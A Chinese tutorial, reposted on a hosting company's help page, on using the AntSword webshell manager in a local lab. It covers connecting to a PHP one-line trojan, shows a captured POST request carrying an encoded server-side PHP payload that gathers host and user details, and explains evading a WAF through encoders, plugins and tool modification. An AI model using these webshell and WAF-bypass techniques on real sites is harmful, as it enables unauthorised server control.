首页
最新活动
服务器租用
香港服务器租用
台湾服务器租用
美国服务器租用
日本服务器租用
新加坡服务器租用
高防服务器
香港高防服务器
台湾高防服务器
美国高防服务器
裸金属
香港裸金属服务器
台湾裸金属服务器
美国裸金属服务器
日本裸金属服务器
新加坡裸金属服务器
云服务器
香港云服务器
台湾云服务器
美国云服务器
日本云服务器
CDN
CDN节点
CDN带宽
CDN防御
CDN定制
行业新闻
官方公告
香港服务器资讯
帮助文档
wp博客
zb博客
服务器资讯
联系我们
关于我们
机房介绍
机房托管
登入
注册
帮助文档
专业提供香港服务器、香港云服务器、香港高防服务器租用、香港云主机、台湾服务器、美国服务器、美国云服务器vps租用、韩国高防服务器租用、新加坡服务器、日本服务器租用 一站式全球网络解决方案提供商!专业运营维护IDC数据中心,提供高质量的服务器托管,服务器机房租用,服务器机柜租用,IDC机房机柜租用等服务,稳定、安全、高性能的云端计算服务,实时满足您的多样性业务需求。 香港大带宽稳定可靠,高级工程师提供基于服务器硬件、操作系统、网络、应用环境、安全的免费技术支持。
联系客服
服务器资讯
/
香港服务器租用
/
香港VPS租用
/
香港云服务器
/
美国服务器租用
/
台湾服务器租用
/
日本服务器租用
/
官方公告
/
帮助文档
中国蚁剑安装使用教程
发布时间:2024-02-29 05:23:47 分类:帮助文档
中国蚁剑安装使用教程 中国蚁剑安装使用教程 前言一、中国蚁剑安装二、中国蚁剑使用2.1中国蚁剑连接木马2.2中国蚁剑设置代理2.3中国蚁剑参数设置2.4中国蚁剑其他使用 三、 中国蚁剑绕过Waf3.1 编码绕过WAF3.2插件绕过waf3.3 修改蚁剑绕过WAF 总结 大家好,我是the-back-zoom,如下是中国蚁剑安装使用教程,拒绝水文,从我做起 前言 中国蚁剑是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。 一、中国蚁剑安装 中国蚁剑安装教程_ccc123ccccc的博客-CSDN博客_rab3it 中国蚁剑的安装直接看这个人写的博客,安装不难,所以我直接讲中国蚁剑的使用 二、中国蚁剑使用 2.1中国蚁剑连接木马 我的服务器地址是192.168.93.129(本地服务器),所以我在根目录下面创建了muma.php文件,文件中的内容如下所示: 类容是一句话木马,连接密码是1. 右键点击添加数据 url填写http://192.168.93.129/muma.php 如上所示,点击测试连接,可以查看是否能够连接成功,点击添加就可以进行如下操作下: 2.2中国蚁剑设置代理 首先点击设置 进行相应的配置 配置正确点击测试连接就可以进行抓包 点击正上方的测试连接 2.3中国蚁剑参数设置 如下所示,是http包的相应的参数 POST /muma.php HTTP/1.1 Host: 192.168.93.129:80 Accept-Encoding: gzip, deflate User-Agent: antSword/v2.1 Content-Type: application/x-www-form-urlencoded Content-Length: 983 Connection: close 1=%40ini_set(%22display_errors%22%2C%20%220%22)%3B%40set_time_limit(0)%3Bfunction%20asenc(%24out)%7Breturn%20%24out%3B%7D%3Bfunction%20asoutput()%7B%24output%3Dob_get_contents()%3Bob_end_clean()%3Becho%20%2230618%22%3Becho%20%40asenc(%24output)%3Becho%20%227a2d1%22%3B%7Dob_start()%3Btry%7B%24D%3Ddirname(%24_SERVER%5B%22SCRIPT_FILENAME%22%5D)%3Bif(%24D%3D%3D%22%22)%24D%3Ddirname(%24_SERVER%5B%22PATH_TRANSLATED%22%5D)%3B%24R%3D%22%7B%24D%7D%09%22%3Bif(substr(%24D%2C0%2C1)!%3D%22%2F%22)%7Bforeach(range(%22C%22%2C%22Z%22)as%20%24L)if(is_dir(%22%7B%24L%7D%3A%22))%24R.%3D%22%7B%24L%7D%3A%22%3B%7Delse%7B%24R.%3D%22%2F%22%3B%7D%24R.%3D%22%09%22%3B%24u%3D(function_exists(%22posix_getegid%22))%3F%40posix_getpwuid(%40posix_geteuid())%3A%22%22%3B%24s%3D(%24u)%3F%24u%5B%22name%22%5D%3A%40get_current_user()%3B%24R.%3Dphp_uname()%3B%24R.%3D%22%09%7B%24s%7D%22%3Becho%20%24R%3B%3B%7Dcatch(Exception%20%24e)%7Becho%20%22ERROR%3A%2F%2F%22.%24e-%3EgetMessage()%3B%7D%3Basoutput()%3Bdie()%3B 如上所示,如果需要添加请求行的参数,或者是POST传递的参数,该如何搞了: 在添加数据下有请求信息配置,如何配置如上所示:如下是其他配置: 2.4中国蚁剑其他使用 三、 中国蚁剑绕过Waf 3.1 编码绕过WAF 设置不同的编码器和解码器可以绕过waf,如下所示: 我的服务器地址是192.168.93.134(本地服务器),所以我在根目录下面创建了muma.php文件,文件中的内容如下所示: 类容是一句话木马,连接密码是1. 右键点击添加数据 url填写http://192.168.93.134/muma.php,然后点击测试连接,连接成功(没有开启安全狗) 开启安全狗连接失败,更改为base64编码器,又连接成功,如下所示: 开启安全狗 基本上开启了waf,你就很难进行连接了,触发waf版本很老 3.2插件绕过waf 如上所示,点击插件市场,进行插件下载 由于shell不断在跟新,waf也在跟新,下载什么插件绕过只能够自己尝试 3.3 修改蚁剑绕过WAF 如下文章,是比较好的绕过waf的手段 蚁剑改造过WAF系列(一) - 0DayBug - 博客园 (cnblogs.com) 总结 如上主要包括蚁剑的下载,连接一句话木马,更改木马连接参数,绕过WAF
上一篇
魔兽台湾服务器
下一篇
日本 美国 欧洲 服务器
相关文章
【网络常用命令汇总】ping和ipconfig命令、nslookup命令、netstat和tracert命令、route和arp命令详解(附图详解)
阿里巴巴怎么客服电话
传奇私服怎么往服务器
Flink:流上的“不确定性”(Non-Determinism)
【幻兽帕鲁】快速一键部署私人服务器
ESP32构建简单WebServer服务器
服务器ip怎么管理员密码
Linux 清理磁盘空间&使用du指令排查服务器磁盘占用过大的文件
配置VMware实现从服务器到虚拟机的一键启动脚本
香港云服务器租用推荐
服务器租用资讯
·广东云服务有限公司怎么样
·广东云服务器怎么样
·广东锐讯网络有限公司怎么样
·广东佛山的蜗牛怎么那么大
·广东单位电话主机号怎么填写
·管家婆 花生壳怎么用
·官网域名过期要怎么办
·官网邮箱一般怎么命名
·官网网站被篡改怎么办
服务器租用推荐
·美国服务器租用
·台湾服务器租用
·香港云服务器租用
·香港裸金属服务器
·香港高防服务器租用
·香港服务器租用特价
7*24H在线售后
高可用资源,安全稳定
1v1专属客服对接
无忧退款试用保障
德讯电讯股份有限公司
电话:00886-982-263-666
台湾总部:台北市中山区建国北路一段29号3楼
香港分公司:九龙弥敦道625号雅兰商业二期906室
服务器租用
香港服务器
日本服务器
台湾服务器
美国服务器
高防服务器购买
香港高防服务器出租
台湾高防服务器租赁
美国高防服务器DDos
云服务器
香港云服务器
台湾云服务器
美国云服务器
日本云服务器
行业新闻
香港服务器租用
服务器资讯
香港云服务器
台湾服务器租用
zblog博客
香港VPS
关于我们
机房介绍
联系我们
Copyright © 1997-2024 www.hkstack.com All rights reserved.